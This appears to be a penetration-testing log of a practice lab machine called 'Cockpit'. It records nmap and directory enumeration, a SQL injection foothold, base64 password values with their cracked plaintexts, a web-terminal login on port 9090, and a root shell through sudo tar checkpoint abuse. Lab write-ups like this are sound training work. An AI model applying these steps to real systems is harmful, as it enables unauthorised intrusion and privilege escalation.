🧪 Pentest Log: {{date:2025-07-27}}

🔍 Target Information

• Machine Name: Cockpit
• IP Address: 192.168.199.10
• Operating System: Linux

ip=192.168.199.10

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

Port 9090

💣 Exploitation / Foothold

📌 Vulnerability Summary

• Service / Port: 80
• Vulnerability Type: SQLI

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

admin

Obtain user password hash

james 	Y2FudHRvdWNoaGh0aGlzc0A0NTUxNTI=
cameron 	dGhpc3NjYW50dGJldG91Y2hlZGRANDU1MTUy

Crack them

james:canttouchhhthiss@455152
carmeron:thisscanttbetouchedd@455152

Login port 9090 service with james' credential to gain a web terminal

🧬 Privilege Escalation

👤 Current Access

• User: james
• Groups: james
• Shell Type: web terminal

🔍 Enumeration

Sudo:

sudo -l

found

User james may run the following commands on blaze:
    (ALL) NOPASSWD: /usr/bin/tar -czvf /tmp/backup.tar.gz *

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Sudo Abuse
• Target Binary/Service: tar
• Reference / Source: GTFOBins

🔧 Exploit Steps

• Smash to root

sudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=/bin/sh